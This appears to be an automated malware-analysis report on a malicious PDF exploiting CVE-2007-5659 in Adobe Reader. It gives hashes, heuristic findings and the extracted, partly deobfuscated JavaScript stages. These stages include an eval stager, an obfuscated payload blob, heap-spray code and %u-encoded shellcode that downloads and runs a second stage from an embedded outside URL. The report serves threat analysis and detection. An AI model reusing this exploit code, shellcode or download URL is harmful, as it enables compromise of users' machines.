PDF malware analysis — malicious · a7638c774085c05c

MALICIOUS

PDF

16.1 KB First seen: 2026-05-08

MD5: 6ae55b6975633b21671db7826452e3f6 SHA-1: 6e9e2b6be8dd83cad7ecc1848ab5b51981c503e9 SHA-256: a7638c774085c05c69b10c854cc1f8b3cb6b5cac297bd99e25e4546a08d2a852

266 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript within its annotations. Heuristics indicate the use of String.fromCharCode and a specific PDF annotation staging primitive ('syncAnnotScan') to decode and execute JavaScript. The extracted JavaScript files, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', are likely responsible for downloading and executing a second-stage payload, as suggested by the presence of obfuscated code and script obfuscation indicators. The exact nature of the payload cannot be determined without further analysis of the executed scripts.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 9

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 4 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.

Matched line in script

var pdaoXx_3 = new Array();var mOW2_OPCx4__Cv = 0;var YYOoMPNJ2c = "";function c_k_3_bw4R3_u(Nc8YP_b, j_Cv_b113Kii){var b_1n_8_eb = j_Cv_b113Kii.toString();var SH8H_u = "";for(var uVQ_VT4G_3 = 0; uVQ_VT4G_3 < b_1n_8_eb.length; uVQ_VT4G_3++) {var AvE301_Mb2 = parseInt(b_1n_8_eb.substr(uVQ_VT4G_3, 1));if (!isNaN(AvE301_Mb2)) {AvE301_Mb2 = AvE301_Mb2.toString(16);if (AvE301_Mb2.length == 1) { AvE301_Mb2 = "0" + AvE301_Mb2; }else if (AvE301_Mb2.length != 2) { AvE301_Mb2 = "00"; }SH8H_u = AvE301_Mb2  …

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://storesigma.com/cgi-bin/ids.html/n002106201r0409Xc29c4422Y195dec80 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0004_000.js`	pdf-javascript-stream	PDF /JS object 4 at offset 0xE1	1814 bytes
SHA-256: `b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }
`numeric_charcode_stage_000.js`	deobfuscated-js	numeric char-code string decoded JavaScript at offset 0xEF	469 bytes
SHA-256: `4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app[fnc]/**/(buf); }
`legacy_pdfkit_stage_000.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1BE0	12068 bytes
SHA-256: `1a46f845e4e4e9ecc265d236d3d2e36e1541c67f0caff85f43126d436794c6fc`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function ew__3_M74p(O010__A, yb86a_h){var fgh = "va";var bc = String [ "fro" + 'mCha' + "rCode"];var b4OT_x_6N8_8 = arguments [ 'c' + "alle" + 'e' ];var tG6xa_0u_8h4_Tc = 0;try {var qt_7_lAD3i0m = 0;if (app) {tG6xa_0u_8h4_Tc++;yb86a_h = pr[qt_7_lAD3i0m].subject;}tG6xa_0u_8h4_Tc++;} catch(e) { }var HV6_7_a_w_H_vV = new Array();if (O010__A) { HV6_7_a_w_H_vV = O010__A;} else {var Obj80LIn_HL = 0;var Yl1RR_o6Ex = 0;var u8n_86u13_U = 512;var f33546f3jt_04 = 53;b4OT_x_6N8_8 = b4OT_x_6N8_8.toString();f33546f3jt_04 = f33546f3jt_04 - 5;var Q_65aG336_vops = f33546f3jt_04 + 10;Q_65aG336_vops = Q_65aG336_vops - 1;while(Yl1RR_o6Ex < b4OT_x_6N8_8.length) {var CpU_10ngN = 1;var Ah47LgPu106_ydg = b4OT_x_6N8_8["charCo" + "deAt"](Yl1RR_o6Ex);if (Ah47LgPu106_ydg >= f33546f3jt_04 && Ah47LgPu106_ydg <= Q_65aG336_vops) {if (Obj80LIn_HL == 4) {Obj80LIn_HL = 0;}if (isNaN(HV6_7_a_w_H_vV[Obj80LIn_HL])) {var qt_7_lAD3i0m = 0;HV6_7_a_w_H_vV[Obj80LIn_HL] = qt_7_lAD3i0m;}HV6_7_a_w_H_vV[Obj80LIn_HL] += Ah47LgPu106_ydg;if (HV6_7_a_w_H_vV[Obj80LIn_HL] > u8n_86u13_U) {HV6_7_a_w_H_vV[Obj80LIn_HL] -= 512;}Obj80LIn_HL++;}Yl1RR_o6Ex++;}}Obj80LIn_HL = 4;for (var b_mSA__V_d = 0; b_mSA__V_d < 4; b_mSA__V_d++) {if (HV6_7_a_w_H_vV[b_mSA__V_d] > 256) {HV6_7_a_w_H_vV[b_mSA__V_d] -= 256;}}var o_D_OG3kn_70 = 0;var b34Og_PRv5Bk__4 = "";var j33m___v = 0;var h_I___W_Dt5_f = 0;var G_5_0_3050 = 0;var SwawSg_Dvr;var nKc7at0 = 23;while(h_I___W_Dt5_f < yb86a_h.length) {var Y__5k_w = yb86a_h.substr(h_I___W_Dt5_f, 1) + "YY";var r4LHQCKLTok1 = parseInt(Y__5k_w, nKc7at0);if (j33m___v) {SwawSg_Dvr += r4LHQCKLTok1;if (o_D_OG3kn_70 == 4) {o_D_OG3kn_70 -= 4;}var KBGUk2vq__3 = SwawSg_Dvr;KBGUk2vq__3 = KBGUk2vq__3 - (G_5_0_3050 + 2) * HV6_7_a_w_H_vV[o_D_OG3kn_70];if (KBGUk2vq__3 < 0) {KBGUk2vq__3 = KBGUk2vq__3 - Math.floor(KBGUk2vq__3 / 256) * 256;}KBGUk2vq__3 = String.fromCharCode(KBGUk2vq__3);if (tG6xa_0u_8h4_Tc == 2) {b34Og_PRv5Bk__4 += KBGUk2vq__3;} else if (tG6xa_0u_8h4_Tc == 1) {b34Og_PRv5Bk__4 += r4LHQCKLTok1;} else {b34Og_PRv5Bk__4 += h_I___W_Dt5_f;}o_D_OG3kn_70++;G_5_0_3050++;j33m___v = 0;} else {SwawSg_Dvr = r4LHQCKLTok1 * 23;j33m___v = 1;}h_I___W_Dt5_f++;}var ac = this;ac["e"+fgh + 'l'](b34Og_PRv5Bk__4);} ew__3_M74p(0, "6a6c82638i27ab00a89m29a2ac312i3250155l2g847i0h6g7d0625831ca54497384g82a65m010j1i797b54111h096j121788175b6i2j346g7k1l5i7kaa727ha6b124a2902e8k53318c668k42012988591m91324k4d47766b6e9198ak795k1c9i101e4b211f67823b565gah54729b0j5h107d3c99442k9j705l9da30j893c432000965i0d2m7f945k523a094a5i955m8a846f98912g25120f4h5i1a00803l7h09929e883g1275aa4i0ma92c666e9993709l4a138518ah2j192e674g1l5e0c6m315b7403380f4b457f1l0162844l5988964i3232a8ai9h4c2i1k5c754l4b1g1g6j75661h8a912k7e8f0a899gae1e3f0b9j392i6k2g9d5e7g54a522a23h2ja046582g4m4c9e832l03ag9g9c379e264c3c324h9e8f467b4j1c6ca23b4g7ma4a86c82414f9d895e0g039e6c5b2jb1a73d8e120m750h66555f2g4d76255a6e93609g972i1gab972c0c3c326h445l1fab0m0236a871085b5d31476754am8da17j4b26110h3457284c99551b4g28945b998h08571d603m63142i859k3j7a1d0a915d512386ac5i0d0b577f62282039575i813c809c5k6g6j079i93921h5a1c9m5g4j5i157d8ea13l15470b3c50245h8g6d5m8h9g641ma30ja99519ac30606g103b309m548da322388339225gb28l946b3e879m8k5b0m320aa67i3b17a02h77271dae9h75676j2i6b9a4a4k7d978m0e9b1e3k0h11581g3lb06b5e8b349f30106g160m5a885j6k7j935f1d998h9f8k389k2g4i642i5f0d5l2b4e569a2j01b03663ak896l9f173d777e4e94aa9d6c6m440dak3396260e02175b6i2j3f6m6i0d6d8f108j6m8eb12l1k9m509i4j255h708f33062d095k27631250252e6f8f4a8d9d9l805m180b2532282b439g7m496k1m963d689b093k1i4962841923909k6ha9999j5f2d22a5869h4c3c2b5k9h4k5546354k4m065i8d01605la0229i99054969331d734i7h10a4akag51206faa3d25a7355b3d9l5d9e8l2daiam0c0m469i1c413l0l3dal831i9c8g0g499j4k5i4l0j8l5777264d8j817h2m170da39k743ea0336e1g3d9c9h3f42773b5i8a3b8d7b1hac0c0a486d000c53b04k2e9g6ia74b144f146f36084i4d5j6h6i8k8a268gah8m9500b030424i38420c6a166b520f4kaj2e41732d71839g435k779759ah210g795i6530a133943j26aa8g3l35653g805jb179980393777a0017031c5803221963627m1eaia39e2b0m992f615b3c6d6i84b1a474a85720a5ae29340521705f1i4c4m083b9c0f0045977g4d8j1l10938a427ha2986g36492b86ac4c2738759f5i4a3f06707iam6a71am5m8laf121g998b1k931haf481b4d096l93772ca53laa7b43252a5a6k798m83734ba3969g921baj1171770538aj7l1i6h7ha2520d4a428d1f0k5j9i547m070d7l0e082a948b532i1e3c7f594ma8186i6j6h507779394k7d97960ba42i6j2219402a6j2h9e969j1i0i2g1f4b11al2j5e3e4957746228007g89630c9iac2d340k419d8f4057769142751e4f6g0ga766911l5lb0a97c1e2k139l7j2i059f098k2c408f9f5c4f3k1e4l6eaf4e8i0i5f83063m450914408f4m0i64465l1g8ial055ma871084i304b6l944a8da79c946e0mb0ac154b00137d4k1a4l1m0d4f8b0828639j625k660a16668k3l9d0711895b432k8k1a7c3m2j8dai372846205j7g9g5163965h6h77afa4911559864e9m733j6l1a958jai3haa3c0d3c2j015473748g8d99a1250b050b0j25223571563k3539973l858j15459i4k2l57041a8f8g5j8309077k0d12ad7i846f32a0309b4845ab0m437d6k2g58a03h86991jaf809321340h9j392i332h8h88773i9d4h013m0297194f393i4c6e5725a9aa8m8b0e1e142h3maj61a8792l786m9l3kb0381m7327995j953k5e8hal59a124ac7d5f3307a4148d4d36749m2f625d3a5684ad777d996aa68i3729b10f3m8h30015l49603l02ae8j3f369b2g644d3i5h6b63am7a74873k09a504264b0124a2881f6b5dah3m9e040g6c9d7g638j3c3g9970496ja28d6i2b2304a1ah64372b5i8g5l5j1b29777g90617jak4a9787001cab9a2d631jb051427f316k937721a445ac4g2h0f427j676j6eaa9f2c070g09a13m153d5b751g3j2d892j6974ak498k535d4l018l5m93245j88835b0l0aaiag8a6k1cam5c812f29a3ac454k82554h74204k72abagb17k133c1ial511d5k0h71999h28054k104f388f4g7d626i849657b17f06a686290b1f2f4b2a2j8m5l1b4e509a2j011f2c611a995170525i85a67c0g0m1592813k2lae188a2c1f82993a463e3g7g8b9e525i8c5m7f7a124m2h0l5gb052aj8j5g783fa21695441m6e08561j354m7674am7b85aj78af082326392a1h9e7k436j5e002g681d214k0d733j8b0a0c7c7033711m8f5f2m190i9hal76370e5m075e3637366a6eae588m9l538f9417afah002b5a1c9m503h440k6k9f8i3e1266044d4h2f387j748g759l8h57b1a809ah2maf1m6i4f2k4139973l858j15459i4k2l4l01a45576388ea9917c2m111c797b4h01a22ka72724a3aa36568f4h89a9478667058cahae1b6514286a2c6c2i9f8i9g4j8e3h103i3m8m52775a4c56716106809407730aa1072g4k05200h7e405c720h35013f447d209f44672i5j87874ga0050173815a2l12418g1c19890k485m3h3d71659e7i760j667h830j1j118l308m220j8f48601g8fb1aa3f36763k512e25496c6c857k748c79ah9caa0a2f161h9l8d3e785e0a5b9h0g084d9b7g4j84182l927f3j75ad108f63522d0c9660420h5g8a31362f0j7h80b16484026498a5a41j0fac498441am70366l288i859a5712760346321l376l425m7d9b9e2aa5a9al0d3da706656d0m3i2a7h54859b1g5i8b625j7h338l73763567b20d4i1b08a7027g690h1i389c2749ae28607f5235867g1c5f75a59e80930i6k3917701h5m38905m86460l22al542505464m3k7a789g57158caa9m9h2913235f2i0m20088f4c78510f5gb00h35551aa84c824f51b1884f02219m88562a1g0h136b3j19ad075f5m5612599d17795ia3829g840k2gb1065f8b4j0l534e554e00200j59219638491l1f746g53977779ah4maa9ja8ak5a061j795d0m7a2h8h57958m3g6ha057455f43136m7l3h711m9f683922a80ja5781b0b53052m343e2g3l8f873f85aa359e7eb0aja38e58631jal72177k1a9h8i8924216d036d3jac63624b8i8e6k9k4f0e8l9i8e49ah15714j0a6d2e9j2j656g2f4100545353360i8278304i0lb15j35379jb2a16c301g2ka74f4c181f397i5i4f5g9c0m8d78118a92824b3k2la346a46j2h718b701f141ma6410l8652563f495d6890098b8e8m6838a0024g3fb15g996h24574a1e5h812i1h4ba57j7l8i4k27910065b22m019e4h3gaf950e96241782992k6l3l19536c9j7c6k93647f7d3e20ai9j357i22am533a5a4e8jaj9a34ad9b1a4h2l233g975c8l7g7k767daj9aah051m2k25705m1a3m5f8g30989i057d9f523j630f3h969k3h7c9e138f3d22aj8b1j55162i7j7k5j3116084954b13h638b6163acb0ab0h931k931haf4m1i49427k8l802f9g7508691f222f8i468k6a7869579g8l9j030l2832704d3332397l2j6c98a771b2502i5mal1b66982k5f8d0e5e1215a77eag480hb15e6j572c14ah62478i2d7f7f1i52a0158c91ah106k0ga7481f383d906f742c8j4ma23g13b21e863949556j5c31ag8ial6lb01j084j3h0h25136e1m5d75966c840l1h52a1a8546h27357c024k0l060k6h8a5b2da1165i4i1fa19a3e3a6c3g568jaf419b935m7m8a034eai9e358927318248663i7m2g9934026i0d7h2c23478f4f0i9fa0814i9m17ad0c2e0418a05l1a4e2m8560719a0j6l948264861a0m6bag619kaa075k6425am94144h460i5fad352d46084d7ma6308m863g6e7da928a2032863162c541j7337720a852ia947af751f0139633i9f66786k288l0i0g0719ab0b7h4c333i0f745b697db064875j305g0b9f5aa42k5899al503l15aa877j3g3haj5c7f271g20ah424i5i1m8a7h1b7l939c02b1ai1i61052048ak3l2k659775289e279e6g0i8k295b2l797c9068047k068m7508a7ah5b5g0g2g99634m57529l3f7a3d2057ae9f499f2635878d431f049l9a5g2f359j1266230jak9h5b435g0l7l6cab6h6c8f8m80890h1ea71b35892m065871831e8dam8d64036b164h2153496e58916jaka26laf9a9k352bb02176524a6i3091336d17104i9f523893192k6m7m36aca79968351e2g94a57d3eb28e8d4m311ab07960843g687i6g6e7g1mad960m2g631lag4b4i4k127gag7c5f1549074a142k38616e905ia872289996900m1h1c1450413l3g2e7m2g5ga4b2459350278e0d9m609b2986068m5b110d248a9k4910a56879272ba99m6k73602a5d6l4a7i79a388850a1f3l0kac3e2c3j0g8j8d6b539a22143l070e227e5f6d4h9j6101acag839j2ea5054e30392g9e6l234j7l0j5ga30e1682ac7b4k8l1c6084856k0iaf1f9d5b5a29984267431aa18l68653j1g5361244k8f988674b10g1ib00i2h0651275j445a4e8i1k973aad9b156l2c483g9758027fa1767daa9da92a1m2k24947j3g3m5f9154719e057d0h573j660f3h74a05k9g9e138d3727028b1j7d3e2h5m7k5j593e2g6g54b13j86ae6163acak1f9l061k9323b0764049427laga84m9g75076c1f242f8i6d6h8c7g69579c919i950l28176k6h3132397i2h6998a7718k542j7hal1b657634568d0e5g1118a87eag440hal3a6j572ba7ag45478i2h5a7g1e52a0a2ad8jag106k10a6441k383d6m8f76278j4ma83l128j1e863f4i5c6m5c318eaf8k73b01j044i3h0a25136k475d51966c802l2078a1a8536m26337c024g0l06a46h8a390ea2145i4i19a59f5f3a6c1f526iag419b95867m84034eb29i3b8h27316266643k7m2g975b008j0d7h2f2347674f0i7a7l7k4f9m17ab0b2db018a05g1a4d2h8560789c0j4e94823m67160h6bag3k7la5965k6428am94a74h460d608b2l2d460b4d5l84308m893i6h7ga9289m9b2b65162c52245013720a862ja74aaf751l0039603i9f6978702f8i990b0h44a93j7j4g1467177g1i6h6b2f6hb25h507h310i5d9e556jb2017g1639afab78553f144fa63g4d9m9h514m7j3i889a3h7ea49g7l940b3e6h001a72am4j0h866a9037a62ha3693l9j195j2g498870600188898e77390m2m1i4k3d4h0l964f4e5b914ca12e1k580b7e6f9222518k83750m2g11a47k2ab293146h4j3aah8g5m4l5d1e728f9e525i0a8m7m910i34al0c49983d028c74700l87a38g4d328c3j79551l449a569670888c79ah9caa0a2f16137d4k356b2h0h35a1082h4g9g573k680i1c9i803j7ea79b7h3019279m0k5a3a2d578j5k5443ai6i7gab5c78ab5h8m7k131j9h892l5a190h51235l33ac7k7k1ma47804451fb0335i3m6e8ga874379dab9e002d071h4i75414f0ka055916baa72al5g228912146j954077ae8h8b2m1i9e8f704415a063835032110a5l685i5a7b830h626716a600ae2k622h184a0l670d745e9h2m0k2k104j2ja722865a53506e5gab0b01ak8m320d354c3e265ba2972k78610f527l3d3i5j186f5a5m2i5j87874ga005016c552a150j3369212983015i405d26599k2c6k9b0g84aeac3847a211358b2i1i88628i1jab12985eag64477i4f503b8c579labaj8b5g1f9fabaf30a71569613i745c802fa1b2236e046f4073340k6686317cad8d984j3c1hae0959262b5h7f3828170a4k4mb15379a758847g0h199k8k235j112i741m5k46ac979350a948aa4025a7638b6d9d8b9b9f4e9187900m191d0m6m413l3d2e7f4g5d6k03790g4m5f4l1h0c8f9d3377929h5d2c119e8f703d03015ga1541b9i275c657j42707d2a7e73978i808d1m343g0f5c1d5b236k7790268e2b9940108h2d4d69616f8k7f1e8c99af6m039hal1i6h1k4h0k9025784mah3e9c0d114kb26f726j3064am8m5h10059l7g8i622f1440644041ab0k5b6251487f991b3j718a6ia9af353h1j9c5a00592f83668k2cb21j095i1094397b2459729777077h74733ma68h1k334j07138b7e446j2lah31819c274d1k4i47863l3c6k9l689j12107l5f4h20a71j840l326ma12l522e1h558i855c80926h6780321g1e0f4d9245267f126c279e0e80300666066e29025m5a588m6e917g3f07am09922e1h106a5c0e6j3a9i585b9hai6208474d4l0j8l8d8c4d58b2a26k1h44aba39h503i015j9f1e1j9i0964537b366i9a3b7e7002ae8ha62b3417ag39b03303665e814a9f3fal512jai43564e6i568c70ab8k7g8m6h09a0al1i6i3g20a88l27705hb25d9m2e1h671i796d7f173c778c4c9jaj92ab7l541f0h338d223898074e53341b51689e3l60105m9k812j132f9e5a8950ad5f38703l8i199k4c1m8c324h3h4c4580638e7iaa7h4faa011h2657023k895k3k422894689c0f004512525k8j2e2c6f70709f1h0l66594g20b21g6i3h327l9g5j600l2l497gah4m7h7m449mak2i1b1b893j841iak701k7d339kae9h1mah3c004g4g2060525k7e679d9l4m10a319100gb1066k773g3b34a65b8d86286m96545c8bag968m975h4d07ai6m112g1la38d5l2i092f7k1e24ae9h666j762d72a33b6a8h0l9180920i5b1fa4672d6b377l98a0210i461f623h012d4d5i6a6g6m7f2ia996a88k149hb0242i3f5h069b166569ae548523115f9j8m5j6g4561afam5j1g310c9e7b4e08083j872f319la5573j6d3g7i9a1f76949e8aa078062c13ab4k8g48ab6a38793f8bb1b2362e8c386i461j3b9d4aa9987l7m6eac10162c4b1e137d4k285l3ca8378e9l007l1k7d645a0i2k9hab3fad1a0a9a5b4m18031g833h34877f393e0d0h475g813e567j365l901iac9m002a8j3i1j703c441e6k8m7l2ga73laa7b331l3460676h8m9994480085a1891ia9104k50465g34aa2971791g62aj493e7f1i0h5l894l5aa08161052g09a3ak44120i597d4g2la823487a73435c9a2i6m7j2089ahae276l00ag391f6e386e959652ak4a1e60230e514l2i6c809e5l0l8daaaf8k1lai23405h093l046i2l4m47913775213i53ah994m984157a19m4c1e2h04a4875e2l120h5m1212748i3137380g536ca050");
`legacy_pdfkit_stage_001.js`	deobfuscated-js	nested inline base-23 callee-key decoded JavaScript at offset 0x1BE0	4923 bytes
SHA-256: `7ae600049a9e23bcd4fd364b3d7c2e847c990abd7c9456f175ac2f58c42c5b97`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pdaoXx_3 = new Array();var mOW2_OPCx4__Cv = 0;var YYOoMPNJ2c = "";function c_k_3_bw4R3_u(Nc8YP_b, j_Cv_b113Kii){var b_1n_8_eb = j_Cv_b113Kii.toString();var SH8H_u = "";for(var uVQ_VT4G_3 = 0; uVQ_VT4G_3 < b_1n_8_eb.length; uVQ_VT4G_3++) {var AvE301_Mb2 = parseInt(b_1n_8_eb.substr(uVQ_VT4G_3, 1));if (!isNaN(AvE301_Mb2)) {AvE301_Mb2 = AvE301_Mb2.toString(16);if (AvE301_Mb2.length == 1) { AvE301_Mb2 = "0" + AvE301_Mb2; }else if (AvE301_Mb2.length != 2) { AvE301_Mb2 = "00"; }SH8H_u = AvE301_Mb2 + SH8H_u;}}while(SH8H_u.length < 8) { SH8H_u = "0" + SH8H_u; }var d_6P_bur = Nc8YP_b.toString(16);if (d_6P_bur.length == 1) { d_6P_bur = "0" + d_6P_bur; }else if (d_6P_bur.length != 2) { d_6P_bur = "00"; }SH8H_u = "3" + d_6P_bur + "P" + SH8H_u;return SH8H_u;}function hfT_hc8f8g(HsUNtPg, K4_Os_e_y){var IBF__48wp5_s_Fk = new Array("");var O7__0f = HsUNtPg;var lAnB6bA850282ep;if ((lAnB6bA850282ep = HsUNtPg.lastIndexOf("%u00")) != -1) {if (lAnB6bA850282ep + 6 == HsUNtPg.length) {IBF__48wp5_s_Fk[0] = HsUNtPg.substr(lAnB6bA850282ep + 4, 2);O7__0f = HsUNtPg.substring(0, lAnB6bA850282ep);}}lAnB6bA850282ep = 1;for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < K4_Os_e_y.length; uVQ_VT4G_3++) {var b__8V6pI6 = K4_Os_e_y.charCodeAt(uVQ_VT4G_3).toString(16);if (b__8V6pI6.length == 1) { b__8V6pI6 = "0" + b__8V6pI6; }IBF__48wp5_s_Fk[lAnB6bA850282ep] = b__8V6pI6;lAnB6bA850282ep++;}uVQ_VT4G_3 = IBF__48wp5_s_Fk[0].length ? 0 : 1;IBF__48wp5_s_Fk[lAnB6bA850282ep] = "00";IBF__48wp5_s_Fk[lAnB6bA850282ep + 1] = "00";lAnB6bA850282ep += 2;if ((IBF__48wp5_s_Fk.length - uVQ_VT4G_3) % 2) {IBF__48wp5_s_Fk[lAnB6bA850282ep] = "00";}while(uVQ_VT4G_3 < IBF__48wp5_s_Fk.length) {O7__0f += "%u" + IBF__48wp5_s_Fk[uVQ_VT4G_3 + 1] + IBF__48wp5_s_Fk[uVQ_VT4G_3];uVQ_VT4G_3 += 2;}O7__0f += "%u0000";return O7__0f;}function Y_2y5u__31515(Bq72255P, lG_5ba){while (Bq72255P.length2<lG_5ba) {Bq72255P += Bq72255P;}Bq72255P = Bq72255P.substring(0,lG_5ba/2);return Bq72255P;}function i_Q__e7_R_ML(Qm_v31Q_4J, Nao3CRQlb, R_15_2n_e_X){var L28H_t = 0x0c0c0c0c;var Bq72255P = unescape(Nao3CRQlb);var K4_Os_e_y = c_k_3_bw4R3_u(Qm_v31Q_4J, R_15_2n_e_X);var Ga_36I6Yh2_D = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var HsUNtPg = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7270%u5371%u0052%u7468%u7074%u2f3a%u732f%u6f74%u6572%u6973%u6d67%u2e61%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6469%u2e73%u7468%u6c6d%u6e2f%u3030%u3132%u3630%u3032%u7231%u3430%u3930%u6358%u3932%u3463%u3234%u5932%u3931%u6435%u6365%u3038";app.rw46oE1 = unescape(hfT_hc8f8g(HsUNtPg, K4_Os_e_y));var hu7G4T3_KFB1nxI = 